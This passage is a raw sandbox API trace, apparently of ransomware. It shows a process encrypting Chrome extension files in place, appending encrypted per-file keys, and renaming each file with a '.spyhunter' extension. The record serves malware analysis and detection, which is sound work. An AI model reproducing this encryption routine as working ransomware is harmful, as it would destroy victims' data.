lpNumberOfBytesRead=0x270f2dc*=0xdd, lpOverlapped=0x0) returned 1 [0134.179] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffff23, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0134.179] WriteFile (in: hFile=0xec, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xdd, lpNumberOfBytesWritten=0x270f2dc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270f2dc*=0xdd, lpOverlapped=0x0) returned 1 [0134.179] GetProcessHeap () returned 0x2c0000 [0134.180] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0134.180] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.180] WriteFile (in: hFile=0xec, lpBuffer=0x270f31c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f2dc, lpOverlapped=0x0 | out: lpBuffer=0x270f31c*, lpNumberOfBytesWritten=0x270f2dc*=0x4, lpOverlapped=0x0) returned 1 [0134.180] WriteFile (in: hFile=0xec, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f2dc, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f2dc*=0x30, lpOverlapped=0x0) returned 1 [0134.180] CloseHandle (hObject=0xec) returned 1 [0134.180] GetProcessHeap () returned 0x2c0000 [0134.180] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fa3c88 [0134.180] wnsprintfW (in: pszDest=0x2fa3c88, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\messages.json.spyhunter") returned 165 [0134.180] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\messages.json.spyhunter")) returned 1 [0134.181] GetProcessHeap () returned 0x2c0000 [0134.181] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fa3c88 | out: hHeap=0x2c0000) returned 1 [0134.181] GetProcessHeap () returned 0x2c0000 [0134.181] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0134.181] GetProcessHeap () returned 0x2c0000 [0134.181] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cef9d8 | out: hHeap=0x2c0000) returned 1 [0134.182] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f318 | out: pbBuffer=0x270f318) returned 1 [0134.182] GetProcessHeap () returned 0x2c0000 [0134.182] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0134.182] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f310*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f310*=0x30) returned 1 [0134.182] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0134.182] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\messages.json") returned 155 [0134.182] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0134.182] GetProcessHeap () returned 0x2c0000 [0134.183] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0134.183] ReadFile (in: hFile=0xec, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270f2d4*=0xd0, lpOverlapped=0x0) returned 1 [0134.183] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffff30, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0134.184] WriteFile (in: hFile=0xec, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x270f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270f2d4*=0xd0, lpOverlapped=0x0) returned 1 [0134.184] GetProcessHeap () returned 0x2c0000 [0134.184] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0134.184] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.184] WriteFile (in: hFile=0xec, lpBuffer=0x270f314*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f2d4, lpOverlapped=0x0 | out: lpBuffer=0x270f314*, lpNumberOfBytesWritten=0x270f2d4*=0x4, lpOverlapped=0x0) returned 1 [0134.184] WriteFile (in: hFile=0xec, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f2d4, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f2d4*=0x30, lpOverlapped=0x0) returned 1 [0134.184] CloseHandle (hObject=0xec) returned 1 [0134.184] GetProcessHeap () returned 0x2c0000 [0134.184] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fa3c88 [0134.184] wnsprintfW (in: pszDest=0x2fa3c88, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\messages.json.spyhunter") returned 165 [0134.184] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\messages.json.spyhunter")) returned 1 [0134.185] GetProcessHeap () returned 0x2c0000 [0134.185] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fa3c88 | out: hHeap=0x2c0000) returned 1 [0134.185] GetProcessHeap () returned 0x2c0000 [0134.185] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0134.185] GetProcessHeap () returned 0x2c0000 [0134.185] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31e600 | out: hHeap=0x2c0000) returned 1 [0134.186] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f310 | out: pbBuffer=0x270f310) returned 1 [0134.186] GetProcessHeap () returned 0x2c0000 [0134.187] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0134.187] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f308*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f308*=0x30) returned 1 [0134.187] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0134.187] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\messages.json") returned 155 [0134.187] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0134.187] GetProcessHeap () returned 0x2c0000 [0134.187] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0134.187] ReadFile (in: hFile=0xec, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f2cc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270f2cc*=0xe6, lpOverlapped=0x0) returned 1 [0134.188] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffff1a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0134.188] WriteFile (in: hFile=0xec, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x270f2cc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270f2cc*=0xe6, lpOverlapped=0x0) returned 1 [0134.188] GetProcessHeap () returned 0x2c0000 [0134.188] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0134.188] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.188] WriteFile (in: hFile=0xec, lpBuffer=0x270f30c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f2cc, lpOverlapped=0x0 | out: lpBuffer=0x270f30c*, lpNumberOfBytesWritten=0x270f2cc*=0x4, lpOverlapped=0x0) returned 1 [0134.211] WriteFile (in: hFile=0xec, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f2cc, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f2cc*=0x30, lpOverlapped=0x0) returned 1 [0134.211] CloseHandle (hObject=0xec) returned 1 [0134.211] GetProcessHeap () returned 0x2c0000 [0134.211] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb3cd0 [0134.211] wnsprintfW (in: pszDest=0x2fb3cd0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\messages.json.spyhunter") returned 165 [0134.211] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\messages.json.spyhunter")) returned 1 [0134.212] GetProcessHeap () returned 0x2c0000 [0134.212] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb3cd0 | out: hHeap=0x2c0000) returned 1 [0134.212] GetProcessHeap () returned 0x2c0000 [0134.212] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0134.212] GetProcessHeap () returned 0x2c0000 [0134.212] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31e2f8 | out: hHeap=0x2c0000) returned 1 [0134.213] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f310 | out: pbBuffer=0x270f310) returned 1 [0134.213] GetProcessHeap () returned 0x2c0000 [0134.213] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0134.213] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f308*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f308*=0x30) returned 1 [0134.213] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\manifest.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0134.217] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\manifest.json") returned 143 [0134.217] StrStrW (lpFirst="manifest.json", lpSrch=".txt") returned 0x0 [0134.217] GetProcessHeap () returned 0x2c0000 [0134.217] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0134.217] ReadFile (in: hFile=0x158, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f2cc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270f2cc*=0x2d5, lpOverlapped=0x0) returned 1 [0134.316] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffd2b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0134.316] WriteFile (in: hFile=0x158, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2d5, lpNumberOfBytesWritten=0x270f2cc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270f2cc*=0x2d5, lpOverlapped=0x0) returned 1 [0134.316] GetProcessHeap () returned 0x2c0000 [0134.316] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0134.316] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.316] WriteFile (in: hFile=0x158, lpBuffer=0x270f30c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f2cc, lpOverlapped=0x0 | out: lpBuffer=0x270f30c*, lpNumberOfBytesWritten=0x270f2cc*=0x4, lpOverlapped=0x0) returned 1 [0134.316] WriteFile (in: hFile=0x158, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f2cc, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f2cc*=0x30, lpOverlapped=0x0) returned 1 [0134.316] CloseHandle (hObject=0x158) returned 1 [0134.376] GetProcessHeap () returned 0x2c0000 [0134.376] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0134.377] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\manifest.json.spyhunter") returned 153 [0134.377] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\manifest.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\manifest.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\manifest.json.spyhunter")) returned 1 [0134.377] GetProcessHeap () returned 0x2c0000 [0134.377] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0134.378] GetProcessHeap () returned 0x2c0000 [0134.378] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0134.378] GetProcessHeap () returned 0x2c0000 [0134.378] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff3bd8 | out: hHeap=0x2c0000) returned 1 [0135.458] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f2f8 | out: pbBuffer=0x270f2f8) returned 1 [0135.460] GetProcessHeap () returned 0x2c0000 [0135.460] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0135.460] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f2f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f2f0*=0x30) returned 1 [0135.460] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\en\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\en\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0135.461] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\en\\messages.json") returned 157 [0135.461] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0135.461] GetProcessHeap () returned 0x2c0000 [0135.461] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0135.461] ReadFile (in: hFile=0x17c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f2b4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270f2b4*=0xb3, lpOverlapped=0x0) returned 1 [0135.462] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0135.462] WriteFile (in: hFile=0x17c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x270f2b4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270f2b4*=0xb3, lpOverlapped=0x0) returned 1 [0135.462] GetProcessHeap () returned 0x2c0000 [0135.462] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0135.462] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.462] WriteFile (in: hFile=0x17c, lpBuffer=0x270f2f4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f2b4, lpOverlapped=0x0 | out: lpBuffer=0x270f2f4*, lpNumberOfBytesWritten=0x270f2b4*=0x4, lpOverlapped=0x0) returned 1 [0135.463] WriteFile (in: hFile=0x17c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f2b4, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f2b4*=0x30, lpOverlapped=0x0) returned 1 [0135.463] CloseHandle (hObject=0x17c) returned 1 [0135.463] GetProcessHeap () returned 0x2c0000 [0135.463] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0135.463] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\en\\messages.json.spyhunter") returned 167 [0135.463] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\en\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\en\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\en\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\en\\messages.json.spyhunter")) returned 1 [0135.464] GetProcessHeap () returned 0x2c0000 [0135.464] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0135.464] GetProcessHeap () returned 0x2c0000 [0135.464] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0135.464] GetProcessHeap () returned 0x2c0000 [0135.464] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f81ed8 | out: hHeap=0x2c0000) returned 1 [0135.466] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f2f0 | out: pbBuffer=0x270f2f0) returned 1 [0135.466] GetProcessHeap () returned 0x2c0000 [0135.466] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0135.466] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f2e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f2e8*=0x30) returned 1 [0135.466] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0135.467] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\messages.json") returned 157 [0135.467] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0135.467] GetProcessHeap () returned 0x2c0000 [0135.467] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0135.467] ReadFile (in: hFile=0x17c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f2ac, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270f2ac*=0xb3, lpOverlapped=0x0) returned 1 [0135.468] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0135.468] WriteFile (in: hFile=0x17c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x270f2ac, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270f2ac*=0xb3, lpOverlapped=0x0) returned 1 [0135.468] GetProcessHeap () returned 0x2c0000 [0135.468] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0135.468] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.468] WriteFile (in: hFile=0x17c, lpBuffer=0x270f2ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f2ac, lpOverlapped=0x0 | out: lpBuffer=0x270f2ec*, lpNumberOfBytesWritten=0x270f2ac*=0x4, lpOverlapped=0x0) returned 1 [0135.468] WriteFile (in: hFile=0x17c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f2ac, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f2ac*=0x30, lpOverlapped=0x0) returned 1 [0135.469] CloseHandle (hObject=0x17c) returned 1 [0135.469] GetProcessHeap () returned 0x2c0000 [0135.469] RtlAllocateHeap (HeapHandle=0x2c0000, 